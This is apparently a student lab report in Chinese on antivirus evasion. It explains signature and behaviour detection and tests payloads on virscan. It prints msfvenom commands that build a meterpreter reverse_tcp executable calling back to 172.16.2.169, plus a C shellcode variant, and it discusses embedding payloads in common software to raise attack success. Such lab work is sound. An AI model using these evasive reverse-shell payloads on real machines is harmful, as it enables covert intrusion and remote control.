实践内容
(1)理解免杀技术原理
(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;
(成功实现了免杀的。如何做成功的简单语言描述即可,不要截图、指令。与杀软共生的结果验证要截图。)
(3)通过组合应用各种技术实现恶意代码免杀
(4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
基础问题回答
1.杀软是如何检测出恶意代码的?
基于特征码的检测:杀软通过对已存在的流行代码特征的提取与比对检测到具有该特征码的程序就当作检测到了恶意代码。
基于行为的检测:杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等。
2.免杀是做什么?
通过一些手段来瞒过杀软的检测扫描,避免被杀毒软件查杀,并能成功控制被植入机。
3.免杀的基本方法有哪些?
对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码,减少对系统的修改,多在内存里进行操作,多使用反弹式的连接。
实践过程
本次实验测试网址:http://www.virscan.org/
1、msfvenom直接生成meterpreter可执行文件并检测:
使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.169 LPORT=5329 -f exe > 5329met-encoded.exe
然后将该程序上传到virscan扫描:
2.用Veil-Evasion生成可执行文件
命令行直接输入veil-evasion打开软件,然后在menu里输入命令生成可执行文件:
上传文件,检测结果:
3.shellcode编程
在kali终端下生成一个c格式的十六进制数组,使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=302 -f c命令生成一个C语言shellcode数组。
实践总结与体会
1、通过本次实验,我了解了一般的杀毒软件查杀的原理,一般的恶意代码是如何想尽办法伪装的;
2、我们很容易的发现单单依赖查杀软件或者防火墙是不会完美保护我们的电脑主机的;
3、我们要提高自身的安全保护意识和专业知识,才能降低我们被恶意代码侵害的风险。
离实战还缺些什么技术或步骤?
1、首先,靶机不会乖乖的让我们传送目标文件,反弹式连接很重要,将恶意代码融进用户常用的应用程序可以提高我们的攻击成功率,但是黑进主流的常用软件程序内部是一件很难的事情;
2、其次,一般的杀毒软件对主流的编码、加壳的平台程序都会有研究,直接使用这些平台进行攻击成功的几率极其小,我们需要自己的手工的在恶意代码中添加一些东西,这需要更加专业的知识,对各种系统更深的了解;
3、目前所做的实验只局限在同一网段,但是现实中的IP的变幻多端的,很复杂。